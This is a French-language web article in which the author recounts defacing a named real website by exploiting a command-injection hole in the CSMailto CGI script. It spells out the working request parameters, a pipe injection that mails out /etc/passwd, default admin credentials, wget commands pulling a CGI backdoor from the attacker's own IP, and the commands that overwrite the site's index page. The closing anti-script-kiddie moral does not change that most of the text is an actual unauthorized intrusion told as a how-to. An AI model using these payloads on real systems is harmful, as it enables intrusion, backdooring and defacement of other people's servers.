<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>La triste r&eacute;alit&eacute; sur les scripts kiddies par sirius_black</title>
      
  <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
  
<body bgcolor="#FFFFFF" text="#000000">
<div align="center"><b><big><big><big><font size="6">La triste r&eacute;alit&eacute; 
  sur les scripts kiddies</font></big></big></big></b><br>
 <br>
 
  <div align="left"> 
    <p><br>
      <font size="2">Il y a pas mal de temps maintenant, alors que je commen&ccedil;ais 
      &agrave; apprendre qu'elles sont les diff&eacute;rentes failles connues 
      qu'utilisent les pirates, j'avais achet&eacute; le Windows News n&deg;91 
      : "Pirates, la grande menace".<br>
      L'article &eacute;tait assez complet et d&eacute;crivait bien les diff&eacute;rents 
      univers de l'underground informatique. Evidemment y'avait quelques conneries... 
      mais pas trop <img src="../media/tape_pc.gif" width="30" height="30"><br>
      A un moment ils parlaient des Scripts Kiddies et le titre du chapitre &eacute;tait 
      "Piratage, rien &agrave; voir avec le talent". L'article parlait de la faille 
      unicode et de d&eacute;fa&ccedil;ages fait en moins de 2 minutes.<br>
      A l'&eacute;poque, je m'&eacute;tais dit "rien &agrave; voir avec le talent" 
      ?? ils exag&egrave;rent un peu &ccedil;a doit pas &ecirc;tre aussi facile 
      que &ccedil;a !!<br>
      <br>
      Pourtant ils avaient raison...<br>
      Voici comment j'ai d&eacute;fac&eacute; le site www.plionline.com en utilisant 
      les techniques des Scripts Kiddies.</font><br>
      <br>
      <b>Trouver la faille</b><br>
      <font size="2">L&agrave; vous vous dites : koi ? Comment &ccedil;a comment 
      trouver la faille ? Commences d'abord par "Trouver le victime" !!!.<br>
      Ben en fait les SK (Script Kiddies) ne cherchent pas vraiment une victime 
      sp&eacute;ciale. Ils connaissent une faille, &agrave; partir de l&agrave; 
      ils scannent des sites vuln&eacute;rables et ils les d&eacute;facent (t'as 
      le bon et le mauvais hacker koi LoL). Plus s&eacute;rieusement ce que je 
      n'aime pas chez les scripts kiddies c leur manque d'&eacute;thique. Tout 
      ce qu'il cherchent c'est &ecirc;tre dans le top 50 de zone-h.org.<br>
      <img src="../media/vivemoi.gif" width="67" height="46"><br>
      Ils d&eacute;fa&ccedil;ent sans se soucier de qui sont leurs victimes. Un 
      exemple : les mecs ki on pirat&eacute;s Amnesty International, Greenpeace 
      &amp; Co pensent impressionner la sc&egrave;ne en faisant cel&agrave; mais 
      tout ce qu'il r&eacute;ussissent &agrave; faire c'est impressionner leur 
      petite soeur (encore faut-il quelle ait un QI plus faible, ce ki est pas 
      gagn&eacute;).<br>
      Bon revenu &agrave; nos moutons...<br>
      Moi la faille choisie c'est la faille CSMailto (version 1).<br>
      CSMailto c'est un script payant d&eacute;vellop&eacute; par le site cgi-script.net.<br>
      Il permet d'envoyer par mail un formulaire que l'on a rempli (en quelque 
      sorte c'est un form action=mailto:admin@site.com mais en cgi).<br>
      Comme tous les scripts de cgi-script il a beaucoup de fonctionnalit&eacute;s 
      comme permettre &agrave; l'admin d'ex&eacute;cuter des commandes sur le 
      serveur.<br>
      Comme tous les scripts de cgi-script il est bourr&eacute; de failles de 
      s&eacute;curit&eacute; donc n'importe qui peut ex&eacute;cuter ces commandes.<br>
      Bien entendu tout se fait avec les droits du serveur.</font><br>
      <br>
      <b>Trouver une victime</b><br>
      <font size="2">Donc comment trouver des sites victimes vuln&eacute;rables 
      &agrave; une faille CGI ?<br>
      Le script est install&eacute; par d&eacute;faut dans le rep /cgi-script/CSMailto/CSMailto.cgi 
      et les formulaires dans /cgi-script/CSMailto/forms/<br>
      Pour trouver une simple recherche sur google suffit.<br>
      Le r&eacute;f&eacute;rencement est sans aucun doute le plus chiant.<br>
      <img src="../media/war.gif" width="61" height="38"><br>
      G cr&eacute;e un fichier Excell (ben non pas avec OpenOffice : rapeller 
      vous kon fait du script kidding) dans lequel j'ai mis les url des formulaires.<br>
      Ensuite j'ai r&eacute;cup&eacute;r&eacute; les banni&egrave;res des serveurs 
      web de chaque site et j'ai tout mis dans le fichier Exell.<br>
      A partir de l&agrave;... une centaine de sites <u>peut-&ecirc;tre</u> vuln&eacute;rables.<br>
      Je prends les victimes au hazard, la premi&egrave;re qui marche je l'attaque.</font></p>
    <p><b>Exploiter la victime</b><font size="2"><img src="../media/pirate.gif" width="32" height="32"><br>
      La premi&egrave;re victime ke je trouve c'est www.plionline.com<br>
      Une vuln&eacute;rabilit&eacute; du script permet de s'envoyer un fichier 
      du serveur ou d'ex&eacute;cuter une commande et de se mailer l'output. Donc 
      g test&eacute; en m'envoyant le fichier /etc/passwd.<br>
      Pour que l'exploit marche plusieurs conditions doivent entrer en jeu. Tout 
      d'abord il faut que la variable form-name qui est de type hidden dans le 
      formulaire soit valide. Elle est simple &agrave; trouver puisque c'est le 
      nom du formulaire sans l'extension.<br>
      Il faut aussi que les variables en gras dans le formulaire soit pr&eacute;sentes 
      lors de la requ&ecirc;te.<br>
      De toute fa&ccedil;on le formulaire est assez parlant sur les variables 
      que l'on a oubli&eacute; :</font></p>
    <p><font size="2">Par exemple on passe au script /cgi-script/CSMailto/CSMailto.cgi<br>
      les param&ecirc;tres suivants :<br>
      </font><font size="2">form-attachment=/etc/passwd&amp;Email=sirius_black@imel.org&amp;VEmail=sirius_black@imel.org&amp;FirstName=a&amp;LastName=a&amp;Comments=a&amp;<br>
      Address1=a&amp;Adresse2=a&amp;City=a&amp;HomePhone=31337666&amp;State=a&amp;Country=a&amp;payment=a&amp;Zip=123&amp;order=a&amp;LibraryName=a&amp;<br>
      previousversion=a&amp;form-autoresponse=YES&amp;command=mailform&amp;form-name=application<br>
      </font></p>
    <p><font size="2">On obtient :<br>
      </font><font size="2"><br>
      &lt;body bgcolor=#C0C0C0&gt;<br>
      &lt;script language=javascript&gt;<br>
      alert(&quot;Error. Field Occupation is required&quot;);<br>
      history.back();<br>
      &lt;/script&gt;<br>
      </font></p>
    <p><font size="2">Dans ce cas il faut rajouter une variable Occupation.<br>
      Pour r&eacute;cup&eacute;rer l'output d'une commande on utilise le pipe 
      | :<br>
      CSMailto.cgi?form-attachment=/bin/cat%20/etc/passwd|&amp;Email=sirius_black@imel.org&amp;form-autoresponse=YES&amp;command=mailform 
      &amp;form-name=application&amp;....<br>
      Je re&ccedil;oit effectivement le fichier qui contient entre autre la ligne 
      </font></p>
    <pre>plionline:x:521:518::/home/plionline:/bin/bash</pre>
    <font size="2"> Donc les pass sont shadow. Le fichier passwd est assez grand 
    car plionline n'est pas sur un serveur d&eacute;di&eacute; mais sur le serveur 
    d'un h&eacute;bergeur commercial avec DNS &amp; co.<br>
    Comme &ccedil;a marche je balance des commandes. Tout se fait comme si on 
    &eacute;tait dans le r&eacute;pertoire CSMailto (un pwd donne /home/www/plionline/cgi-script/CSMailto. 
    Donc je fait des ls, ls .., ls ../../ etcaetera. Au bout d'un moment je recr&eacute;e 
    l'arborescence :</font><br>
<pre>Profile_Reservation_Form.doc<br>Profile_Reservation_Form.pdf<br>Profile_Reservation_Form.txt<br>_private/<br>_vti_bin/<br>_vti_cnf/<br>_vti_inf.html<br>_vti_log/<br>_vti_pvt/<br>_vti_txt/<br>application.htm<br>apply-foot.htm<br>apply-head.htm<br>cgi-bin-oldzao/<br>cgi-script/<br>   CSMailto/<br>      <font color="red">CSMailto.cgi</font><br>      MIME<br>      README.txt<br>      _vti_cnf<br>      attach<br>      <font color="green">bd<br>      bd.1</font><br>      color_selector.htm<br>      export<br>      forms/<br>         _vti_cnf<br>         application-ORIG.htm<br>         <font color="red">application.htm</font><br>         index.htm<br>         test.htm<br>      info.cgi<br>      libs.cgi<br>      setup.cgi<br>      t<br>      t_Form.htmt_List_Form.htm<br>      t_Mailto_Form.htm<br>      t_login.htm<br>      t_show_links.htm<br>      t_upload.htm<br>      test.cgi<br>      test.txt<br>      text.txt<br>      top.gif<br>      u<br>   _vti_cnf/<br>   <font color="green">hax.htm</font><br>cgibin/<br>   _vti_cnf/<br>   apply.cgi<br>   formmail.cgi<br>   mailer.cgi<br>   mailer_admin.cgi<br>   mailer_cfg.cgi<br>   mailer_setup.cgi<br>contact.htm<br>css_scripts/<br>   _vti_cnf/<br>   body.css<br>   bookmark.js<br>   cellhighlight.js<br>   dull_mouseover.js<br>   formfield-highlight.js<br>   gradual_mo.js<br>   link-iframe.js<br>   popup.js<br>   random.js<br>   randompix.js<br>   rollover.js<br>   showdate.js<br>   thought.js<br>   toolbar.txt<br>   tri-image-rollover.js<br>deposit.htm<br>faq.htm<br>faq.html<br>guestbook<br>images<br><font color="red">index.htm</font><br>missing.html<br>new-apply.htm<br>new-contact.htm<br>new-options.htm<br>new-packet.htm<br>options.htm<br>packet.htm<br>packet_payment.htm<br>plionline-213x50.jpg<br>plionline-468x60.gif<br>plionline-88x31.gif<br>postinfo.html<br>realaudio<br>testimonials.htm<br>travel_services.htm<br>wusage/<br><font color="red">wwwboard/</font><br></pre>
    <p><font size="2">En rouge les trucs ki servent (ou qui peuvent servir) au 
      d&eacute;fa&ccedil;age, en vert les trucs marrants.<br>
      Le uname -a donne &nbsp;: Linux stancehosting.propagation.net 2.4.20-ci 
      #12 SMP Fri Dec 13 22:52:24 CST 2002 i686 unknown<br>
      On remarque aussi le repertoire wwwboard, on essaye le login/pass par d&eacute;faut 
      : WebAdmin:WebBoard<br>
      Evidemment &ccedil;a marche. de tout &eacute;vidence l'admin n'a rien &agrave; 
      foutre de la s&eacute;curit&eacute;.<br>
      Une fois ke j'ai l'arborescence je peux voir le contenu des fichiers en 
      tappant l'url dans mon navigateur.<br>
      J'essaie donc quelques trucs...<br>
      Tiens un fichier html dans cgi-script/ kes qu'il fout l&agrave; ?<br>
      Je demande la page avec mon browser et j'obtiens :</font><br>
      <img src="../media/hax.jpg" width="800" height="600"> <br>
      <font size="2">Ben tiens je suis pas le premier &agrave; d&eacute;facer 
      ce site !!! (&ccedil;a restera dans ma m&eacute;moire &ccedil;a). En fait 
      l'admin a gard&eacute; un ancien d&eacute;facage en souvenir, c plut&ocirc;t 
      sympa non ? on va lui en donner un autre :p<br>
      De m&ecirc;me je demande bd et bd.1, je tombe sur deux progs au formats 
      ELF dans lequel je vois les chaines "f0ul", "fuck you bitch!!!", "/bin/sh 
      -i", "tcp" au milieu de caract&egrave;res h&eacute;xa.<br>
      Au cas o&ugrave; vous le sauriez pas les h4x0rs lab sont des hackers br&eacute;siliens 
      dont les fondateurs sont USDL et f0ul, et les 5&egrave;mes du classement 
      zone-h.<br>
      Et r&eacute;v&eacute;lation : ils font tourner leurs backdoors sur le port 
      2323.<br>
      Mais je suis pas pass&eacute; par l&agrave; (en plus &ccedil;a marchait 
      pas). J'ai fait t&eacute;l&eacute;charger la backdoor gH-cgi. Comme son 
      nom l'indique c'est une backdoor cgi :) donc ind&eacute;tectable au niveau 
      des ports.<br>
      Pour cel&agrave; j'ai pass&eacute; au script la commande "/usr/bin/wget%20http://mon_ip/gH-cgi.c|"<br>
      Je v&eacute;rifie que l'upload a r&eacute;ussi avec mon navigateur puis 
      je compile : /usr/bin/make%20gH-cgi|<br>
      et je renomme : /bin/mv%20gH-cgi gH-cgi.cgi|<br>
      J'appelle la page, ma backdoor est fonctionnelle :)</font><br>
      <img src="../media/plibd.jpg" width="800" height="600"> <br>
      <font size="2">J'avais essay&eacute; de modifier l'index sans mettre une 
      backdoor mais &ccedil;a a pas march&eacute; : l'index me renvoyait une page 
      d'erreur en polonais (??).<br>
      Une fois la backdoor install&eacute;, ya plus besoin de donner le chemin 
      complet des ex&eacute;cutables ; c'est plus facile :p<br>
      cd ../../;wget http://mon_ip/hacked.htm;mv hacked.htm index.htm;wget http://mon_ip/sb2.jpg 
      (l'image ki va avec).</font><br>
      <font size="2">Je v&eacute;rifie que &ccedil;a a march&eacute; :</font><br>
      <img src="../media/plionline.jpg" width="800" height="600"><br>
      <font size="2">Ke fait le script kiddie ensuite ? il se jette sur www.zone-h.org 
      pour r&eacute;f&eacute;rencer son hack.<br>
      Ca y est je suis dans les d&eacute;faceurs du jour, au milieu d'une trentaine 
      de d&eacute;fa&ccedil;ages de PsychoPhobia.<br>
      Si vous faites une recherche sur www.plionline.com sur zone-h vous verrez 
      le d&eacute;fa&ccedil;age des h4x0rs lab et le mien.</font></p>
    <p><b>Conclusion</b><font size="2"><br>
      Qu'est ce que j'ai gagn&eacute; ? rien !! A si g r&eacute;cup&eacute;r&eacute; 
      les sources des CGI histoire de les avoir gratos (Land Of The FREE powa 
      !!)<br>
      Est-ce que c'&eacute;tait difficile ? non !!! Je peux m&ecirc;me recommencer 
      si &ccedil;a me chante !! J'ai mis 2 backdoor, l'admin n'en a vir&eacute; 
      qu'une !!<br>
      <img src="../media/spice_di_counass.gif" width="134" height="40"><br>
      Est-ce ke j'ai fait appel &agrave; mes comp&eacute;tences ? A part le fait 
      qu'il faut passer le chemin complet des ex&eacute;cutables aux cgis, ya 
      pas grand chose &agrave; savoir.<br>
      La backdoor ? r&eacute;cup&eacute;r&eacute;e sur packetstorm !! Ya juste 
      besoin de savoir compiler !!<br>
      C'&eacute;tait marrant ? Non m&ecirc;me pas !! c'&eacute;tait chiant &agrave; 
      crever !!! Ya rien &agrave; voir sur ce site :p<br>
      Je comprends pas comment des mecs arrivent &agrave; s'enchainer tous ces 
      d&eacute;fa&ccedil;ages &agrave; la suite !! Si encore y'avait une touche 
      d'originalit&eacute; ; mais non ils fouillent m&ecirc;me pas le serveur, 
      ils r&eacute;p&eacute;tent les m&ecirc;mes commandes &agrave; la suite et 
      laissent un &quot;single line defacement&quot; c'est nul !! Au moins y'en 
      a qui font preuve d'un peu d'originalit&eacute; ou d'humour.<br>
      J'esp&egrave;re au moins qu'ils codent des tools qui font tout le travail 
      &agrave; leur place sinon ils doivent se faire chier !! Ya m&ecirc;me plus 
      de plaisir &agrave; hacker !!</font></p>
    <p><font size="2">Si j'ai &eacute;crit ce texte ce n'est pas pour me vanter 
      : ya aucune fiert&eacute; &agrave; avoir d&eacute;fac&eacute; un site de 
      cette fa&ccedil;on.<br>
      Non si je l'ai &eacute;crit c principalement pour vous dire de ne pas tomber 
      dans la facilit&eacute;. On a tous r&eacute;v&eacute; d'&ecirc;tre dans 
      ce top 50 des pirates les plus &quot;actifs&quot; de la plan&egrave;te mais 
      en r&eacute;alit&eacute; ils n'ont aucun m&eacute;rite !!!<br>
      R&eacute;flechissez : quel est le vrai hacker : celui ki attaque des centaines 
      de sites pris au hazard en utilisant des failles archies connues ou celui 
      ki choisi sa victime et au bo&ucirc;t d'un certain moment arrive &agrave; 
      ses fins ? Retournez coder et participez &agrave; des challenges et tout 
      ira bien ;)<br>
      En m&ecirc;me temps si ce texte peut enlever des &quot;comment on hacke 
      un site&quot; des forums et ben c'est pas plus mal :p<br>
      Certaines personnes ne vont pas aimer ce texte parce qu'elles se reconna&icirc;tront, 
      mais j'esp&egrave;re que &ccedil;a permettra aux newbies de prendre la &quot;bonne&quot; 
      direction :) Etre Script Kiddie c'est ne jamais progresser.</font></p>
    <p><font size="2">Par contre l'admin a eu une bonne intention : elle a vir&eacute; 
      le d&eacute;fa&ccedil;age des h4x0rs lab et a gard&eacute; le mien : www.plionline.com/index1.html<br>
      <br>
      PS : Cet article est dans sa deuxi&egrave;me version. La premi&egrave;re 
      &eacute;tant trop technique par rapport au message &agrave; passer. J'avais 
      par exemple cod&eacute; un exploit &agrave; la con qui envoie des donn&eacute;es 
      avec la m&eacute;thode POST. Mais franchement je ne pense pas qu'un script 
      kiddie sache coder.<img src="../media/parking_boulet.gif" width="70" height="50"></font></p>
    <p>&nbsp;</p>
    <p align="right"><font size="2">sirius_black</font></p>
  </div>
 </div>
 
</body>
</html>
